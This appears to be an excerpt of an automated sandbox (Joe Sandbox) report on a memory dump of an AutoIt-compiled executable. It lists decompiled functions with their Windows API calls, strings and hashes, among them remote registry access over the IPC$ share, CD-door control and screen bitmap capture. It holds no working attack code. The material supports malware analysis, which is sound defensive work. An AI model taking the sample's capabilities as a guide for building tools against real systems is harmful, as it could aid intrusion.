
open, xrefs: 00F6A3F2
close, xrefs: 00F6A3D1
type cdaudio alias cd wait, xrefs: 00F6A443
close cd wait, xrefs: 00F6A4B0
wait, xrefs: 00F6A482
closed, xrefs: 00F6A3DF, 00F6A3E8
set cd door , xrefs: 00F6A466
open , xrefs: 00F6A427

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 8c1bbdcbff611996eb786aff4871e2e7fe2144758c3d087b2f03ec0f964c000c
Instruction ID: bf314a955d09ede5d21ff412409c1d08ade7ff78192cd5a26b4266bd7a1c4d88
Opcode Fuzzy Hash: 8c1bbdcbff611996eb786aff4871e2e7fe2144758c3d087b2f03ec0f964c000c
Instruction Fuzzy Hash: 03515D715083059FC700EF11CC8196AB7E8EF84758F50886DF89A672A2DB75ED0AEF52

Function 00F5F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00F3E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00F5F8DF
LoadStringW.USER32(00000000,?,00F3E029,00000001), ref: 00F5F8E8

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

GetModuleHandleW.KERNEL32(00000000,00FC5310,?,00000FFF,?,?,00F3E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00F5F90A
LoadStringW.USER32(00000000,?,00F3E029,00000001), ref: 00F5F90D
__swprintf.LIBCMT ref: 00F5F95D
__swprintf.LIBCMT ref: 00F5F96E
_wprintf.LIBCMT ref: 00F5FA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F5FA2E

Strings

Error: , xrefs: 00F5F9E5
^ ERROR, xrefs: 00F5F9C3
Line %d:, xrefs: 00F5F968
%s (%d) : ==> %s: %s %s, xrefs: 00F5FA12
Line %d (File "%s"):, xrefs: 00F5F957

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 85ed6c35a920e7c7791b5f0027f932573aca97a4e0b1e2f256975b51e08d8982
Instruction ID: cfb69a025264df603af090b4763325a7d5b8998ca9a2934e5d29f66b18c2579a
Opcode Fuzzy Hash: 85ed6c35a920e7c7791b5f0027f932573aca97a4e0b1e2f256975b51e08d8982
Instruction Fuzzy Hash: 31410B7280521DAACF04FBA0DD86DEEB778AF54311F5000A5B605A6091EA396F0DFB61

Function 00F8BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00F89207,?,?), ref: 00F8BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00F89207,?,?,00000000,?), ref: 00F8BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00F89207,?,?,00000000,?), ref: 00F8BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,00F89207,?,?,00000000,?), ref: 00F8BA85
GlobalLock.KERNEL32(00000000), ref: 00F8BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F89207,?,?,00000000,?), ref: 00F8BA9D
GlobalUnlock.KERNEL32(00000000), ref: 00F8BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,00F89207,?,?,00000000,?), ref: 00F8BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F89207,?,?,00000000,?), ref: 00F8BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00F92CAC,?), ref: 00F8BAD7
GlobalFree.KERNEL32(00000000), ref: 00F8BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 00F8BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00F8BB36
DeleteObject.GDI32(00000000), ref: 00F8BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F8BB74

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 18276eeaba29cf66fbfbf82fa61f1ec0729bc2a6b29b7694844279ca92f8ff3c
Instruction ID: 654ee0425d4361f0f457a84c84eff9fa19d076086f97a8d9ae0417b35d5acc14
Opcode Fuzzy Hash: 18276eeaba29cf66fbfbf82fa61f1ec0729bc2a6b29b7694844279ca92f8ff3c
Instruction Fuzzy Hash: 6E410875600208AFDB119F65DC88EFA7BB8EB89B21F104069F906D7260D7349905EB60

Function 00F6D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00F6DA10
_wcscat.LIBCMT ref: 00F6DA28
_wcscat.LIBCMT ref: 00F6DA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F6DA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 00F6DA63
GetFileAttributesW.KERNEL32(?), ref: 00F6DA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 00F6DA95
SetCurrentDirectoryW.KERNEL32(?), ref: 00F6DAA7

Strings

*.*, xrefs: 00F6DAE6

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: cc760a2d31afe6e5315ec8024dad517bf6c5ca74171de5df7c9d224e614ec556
Instruction ID: 9c9b4d62a58585f55cb98b3567b05aab45628b6ac3e33598fbe5b6642a8cba87
Opcode Fuzzy Hash: cc760a2d31afe6e5315ec8024dad517bf6c5ca74171de5df7c9d224e614ec556
Instruction Fuzzy Hash: 94819572E083459FCB24DF64C844A6AB7E4BF89364F188C2EF489CB251E734D945EB52

Function 00F8C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F8C1FC
GetFocus.USER32 ref: 00F8C20C
GetDlgCtrlID.USER32(00000000), ref: 00F8C217
_memset.LIBCMT ref: 00F8C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F8C36D
GetMenuItemCount.USER32(?), ref: 00F8C38D
GetMenuItemID.USER32(?,00000000), ref: 00F8C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F8C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F8C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F8C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00F8C489

Strings

0, xrefs: 00F8C33A

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 63a784a0e8950cc2715ed4a2d425b379bc384bddc68338c3ddb7958042c14360
Instruction ID: d2c7a9ce54bbef388b470fe19cb1ca44c2e52708b4fa971aabc0f52222bf9933
Opcode Fuzzy Hash: 63a784a0e8950cc2715ed4a2d425b379bc384bddc68338c3ddb7958042c14360
Instruction Fuzzy Hash: 8C818D71608305AFD710EF14CC94ABBBBE4FB88724F00492DF99597291D770D945EBA2

Function 00F7731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00F7738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F7739B
CreateCompatibleDC.GDI32(?), ref: 00F773A7
SelectObject.GDI32(00000000,?), ref: 00F773B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F77408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00F77444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F77468
SelectObject.GDI32(00000006,?), ref: 00F77470
DeleteObject.GDI32(?), ref: 00F77479
DeleteDC.GDI32(00000006), ref: 00F77480
ReleaseDC.USER32(00000000,?), ref: 00F7748B

Strings

(, xrefs: 00F77410

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 7efcc71e0b3a72dc5b8b6dd21d783fd3eb872f201b09a6169c6f4efd9cd90316
Instruction ID: 74367d22612bf77f4f8ecce7ddd97f3b1618bbb552d0607eb0bec0f06216e1d7
Opcode Fuzzy Hash: 7efcc71e0b3a72dc5b8b6dd21d783fd3eb872f201b09a6169c6f4efd9cd90316
Instruction Fuzzy Hash: AE515A76904309EFCB14DFA8CC84EAEBBB9EF48310F14852EF95A97211D731A944EB50

Function 00F06A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00F20957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00F06B0C,?,00008000), ref: 00F20973

Part of subcall function 00F04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F04743,?,?,00F037AE,?), ref: 00F04770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F06BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00F06CFA

Part of subcall function 00F0586D: _wcscpy.LIBCMT ref: 00F058A5

Part of subcall function 00F2363D: _iswctype.LIBCMT ref: 00F23645

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00F3E496
EA06, xrefs: 00F3E452
Unterminated string, xrefs: 00F3E7E4
Error opening the file, xrefs: 00F3E43D, 00F3E4B8
AU3!, xrefs: 00F06B61
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00F3E421
Bad directive syntax error, xrefs: 00F3E79D

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 7c460cf2a65e5e2d016274022f75c52925ef887cfde421ceeb0e62657182c93f
Instruction ID: de1d22ec93a19ccfc87626c60756721278d02e68bd48ae27fd1d8bfc57d2f31e
Opcode Fuzzy Hash: 7c460cf2a65e5e2d016274022f75c52925ef887cfde421ceeb0e62657182c93f
Instruction Fuzzy Hash: F502AC315083419FC724EF20CC81AAFBBE5AF98324F14491DF496972A2DB74E949FB52

Function 00F62D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F62D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00F62DDD
GetMenuItemCount.USER32(00FC5890), ref: 00F62E66
DeleteMenu.USER32(00FC5890,00000005,00000000,000000F5,?,?), ref: 00F62EF6
DeleteMenu.USER32(00FC5890,00000004,00000000), ref: 00F62EFE
DeleteMenu.USER32(00FC5890,00000006,00000000), ref: 00F62F06
DeleteMenu.USER32(00FC5890,00000003,00000000), ref: 00F62F0E
GetMenuItemCount.USER32(00FC5890), ref: 00F62F16
SetMenuItemInfoW.USER32(00FC5890,00000004,00000000,00000030), ref: 00F62F4C
GetCursorPos.USER32(?), ref: 00F62F56
SetForegroundWindow.USER32(00000000), ref: 00F62F5F
TrackPopupMenuEx.USER32(00FC5890,00000000,?,00000000,00000000,00000000), ref: 00F62F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F62F7E

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 2643a49fbffeb57ecce29177b500946376f7529455f66ed429f361d3a1c9d9d5
Instruction ID: d7a0b813503a7c54ad10e49e5e12ba6f267d3deedc3e6fc25e38dfee96b52330
Opcode Fuzzy Hash: 2643a49fbffeb57ecce29177b500946376f7529455f66ed429f361d3a1c9d9d5
Instruction Fuzzy Hash: 67710671A01A09BFEB619F54DC49FAABF64FF04324F140226F615AA1E0C7766C10F791

Function 00F577DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

_memset.LIBCMT ref: 00F5786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F578A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F578BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F578D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F57902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00F5792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F57935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F5793A

Strings

SOFTWARE\Classes\, xrefs: 00F5780C
\CLSID, xrefs: 00F57822
\IPC$, xrefs: 00F57882

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 1eb7fb7847a77abade45c8b6dfa45293244ee26bfdf631ef013134dd6f7fff88
Instruction ID: 299f9361fad9b50a0120d2a9dbbfa3d85628923d30b08b2d5e342255e7b58de9
Opcode Fuzzy Hash: 1eb7fb7847a77abade45c8b6dfa45293244ee26bfdf631ef013134dd6f7fff88
Instruction Fuzzy Hash: 2A41F672C1422DAEDF11FBA4EC85DEEB778BF04711B504069E905A21A1DA35AD08EBA0

Function 00F80E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F7FDAD,?,?), ref: 00F80E31

Strings

HKCC, xrefs: 00F80EFF
HKEY_CURRENT_USER, xrefs: 00F80F10
HKCU, xrefs: 00F80F21
HKEY_USERS, xrefs: 00F80F32
HKLM, xrefs: 00F80EAF
HKU, xrefs: 00F80F43
HKEY_LOCAL_MACHINE, xrefs: 00F80E9A
HKEY_CLASSES_ROOT, xrefs: 00F80EC4
HKEY_CURRENT_CONFIG, xrefs: 00F80EEE
HKCR, xrefs: 00F80ED9

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 7d5034cf38f59f4bf4fe4b1aafb8ee760afe8227f80ad97c91e1279e554c0167
Instruction ID: e52e329581d4684bfdc0d4e4af75e4e78296d979c6ecf0392cef37ee56cb2e82
Opcode Fuzzy Hash: 7d5034cf38f59f4bf4fe4b1aafb8ee760afe8227f80ad97c91e1279e554c0167
Instruction Fuzzy Hash: 6D41283250425A8BCF60FF10EC95AEE3764EF11314F948464FE651B292DF78A91AFB60

Function 00F5F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F3E2A0,00000010,?,Bad directive syntax error,00F8F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F5F7C2
LoadStringW.USER32(00000000,?,00F3E2A0,00000010), ref: 00F5F7C9

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

_wprintf.LIBCMT ref: 00F5F7FC
__swprintf.LIBCMT ref: 00F5F81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F5F88D

Strings

., xrefs: 00F5F873
%s (%d) : ==> %s.: %s %s, xrefs: 00F5F7F7
Error: , xrefs: 00F5F85B
Line %d:, xrefs: 00F5F818
Line %d (File "%s"):, xrefs: 00F5F833

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 2a5a496bef192530a743e177864311876c047f502fbc8bdbccc1776478e0aacf
Instruction ID: e3b199691a2414ffd1e7a5ba84e8d96035691cf73d1cf300f8ccf9fc59a9341f
Opcode Fuzzy Hash: 2a5a496bef192530a743e177864311876c047f502fbc8bdbccc1776478e0aacf
Instruction Fuzzy Hash: 1E215C7290021EBFCF11EF90DC0AEEE7739BF18301F0444A5B515660A1EA75AA18FB51

Function 00F652C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

Part of subcall function 00F07924: _memmove.LIBCMT ref: 00F079AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F65330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F65346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F65357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F65369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F6537A

Strings

play PlayMe wait, xrefs: 00F65364
close PlayMe, xrefs: 00F65341, 00F6536E
alias PlayMe, xrefs: 00F65309
play PlayMe, xrefs: 00F65375
status PlayMe mode, xrefs: 00F6532B
open , xrefs: 00F652DF

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 941744e18e3aaa306f569a20942ac77fcdbe4f75a87c40a56c7e616bae9d2a98
